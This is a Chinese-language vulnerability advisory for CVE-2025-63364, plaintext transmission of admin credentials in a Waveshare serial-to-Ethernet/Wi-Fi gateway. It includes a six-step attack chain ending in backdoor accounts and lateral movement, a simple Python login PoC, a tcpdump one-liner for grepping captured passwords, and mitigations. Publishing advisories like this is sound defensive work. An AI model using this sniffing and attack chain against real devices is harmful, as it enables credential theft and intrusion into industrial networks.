CVE-2025-63364: Waveshare网关明文传输管理员凭据漏洞

漏洞信息

漏洞编号

CVE-2025-63364

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway

漏洞概述

CVE-2025-63364是Waveshare公司生产的RS232/485 TO WIFI ETH (B)串口转以太网/Wi-Fi网关设备中存在的严重安全漏洞。该漏洞存在于固件版本V3.1.1.0（硬件版本4.3.2.1，网页版本V7.04T.07.002880.0301）中，设备在网络通信过程中以明文形式传输管理员凭据。攻击者无需任何认证即可通过网络嗅探或中间人攻击获取管理员用户名和密码，从而完全控制该网关设备。由于该设备通常用于工业环境中的串口设备联网，任何人获取管理员权限后都可以修改设备配置、窃听串口通信数据或进一步渗透到连接的内部网络中。此漏洞具有严重的现实威胁，因为攻击者可以利用获取的凭据对设备进行长期控制。

技术细节

该漏洞属于敏感数据明文传输漏洞。在Waveshare RS232/485 TO WIFI ETH (B)网关设备的Web管理界面认证过程中，管理员输入的用户名和密码未经任何加密即以明文形式在HTTP请求中传输。攻击者可以通过以下方式利用此漏洞：1) 网络嗅探：攻击者位于同一网络时，使用抓包工具（如Wireshark）监听HTTP流量，直接获取明文传输的认证凭据；2) 中间人攻击（MITM）：在用户与设备之间进行拦截，捕获未经加密的认证信息；3) ARP欺骗配合流量嗅探：攻击者通过ARP欺骗劫持网络流量并提取敏感信息。获取凭据后，攻击者可以登录Web管理界面，修改设备网络设置、查看或更改串口配置、添加新的管理员账户，甚至可能通过设备固件更新功能植入恶意代码。由于设备固件未采用HTTPS加密传输，所有认证过程均暴露在网络攻击风险之下。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网络中的Waveshare RS232/485 TO WIFI ETH (B)网关设备，获取其IP地址

STEP 2

步骤2

流量嗅探：攻击者使用网络抓包工具（如Wireshark、tcpdump）或进行ARP欺骗，在同一网络段监听HTTP流量

STEP 3

步骤3

凭据捕获：当管理员通过Web界面登录设备时，攻击者捕获明文传输的用户名和密码

STEP 4

步骤4

身份冒充：攻击者使用捕获的凭据登录Web管理界面，获取设备完全控制权

STEP 5

步骤5

持久化控制：攻击者在设备上添加后门账户或修改配置，实现长期访问

STEP 6

步骤6

横向移动：利用网关设备作为跳板，进一步渗透连接到该设备的内部工业控制系统网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-63364 PoC - Waveshare Gateway Plaintext Credential Transmission
# Description: This PoC demonstrates capturing plaintext admin credentials from the vulnerable device

import requests
import json
from urllib.parse import urlencode

TARGET_IP = "192.168.1.100"  # Target device IP
LOGIN_URL = f"http://{TARGET_IP}/cgi-bin/login"

def capture_credentials():
    """
    Simulate credential capture via network sniffing.
    In real attack, use Wireshark/tcpdump to capture HTTP traffic.
    """
    # This PoC shows the vulnerable login request structure
    payload = {
        "username": "admin",
        "password": "admin123"
    }
    
    # Vulnerable: credentials sent in plaintext
    try:
        response = requests.post(LOGIN_URL, data=payload, timeout=5)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Raw Request (vulnerable): {payload}")
        
        # In real attack, capture this via:
        # tcpdump -i eth0 -A 'tcp port 80' | grep password
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False

def verify_vulnerability():
    """
    Check if target device is vulnerable by attempting login
    and observing response patterns.
    """
    print(f"[*] Testing CVE-2025-63364 on {TARGET_IP}")
    print("[*] Vulnerable versions: Firmware V3.1.1.0, HW 4.3.2.1, Webpage V7.04T.07.002880.0301")
    
    result = capture_credentials()
    if result:
        print("[!] Device appears to transmit credentials in plaintext")
        print("[!] Attackers can capture admin credentials via network sniffing")
    
    return result

if __name__ == "__main__":
    verify_vulnerability()

影响范围

Waveshare RS232/485 TO WIFI ETH (B) Firmware V3.1.1.0

Hardware Version 4.3.2.1

Webpage Version V7.04T.07.002880.0301

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议采取以下临时缓解措施：1) 将网关设备部署在受保护的内部网络中，避免直接暴露在不可信网络环境中；2) 使用网络访问控制列表（ACL）限制只有授权IP地址才能访问设备管理界面；3) 监控网络流量，及时发现异常的数据包；4) 考虑使用802.1X端口认证增强网络层安全；5) 如果业务允许，临时关闭设备的Web管理功能，通过物理访问或串口进行配置管理；6) 部署严格的防火墙规则，限制对设备HTTP端口（通常为80/8080）的访问。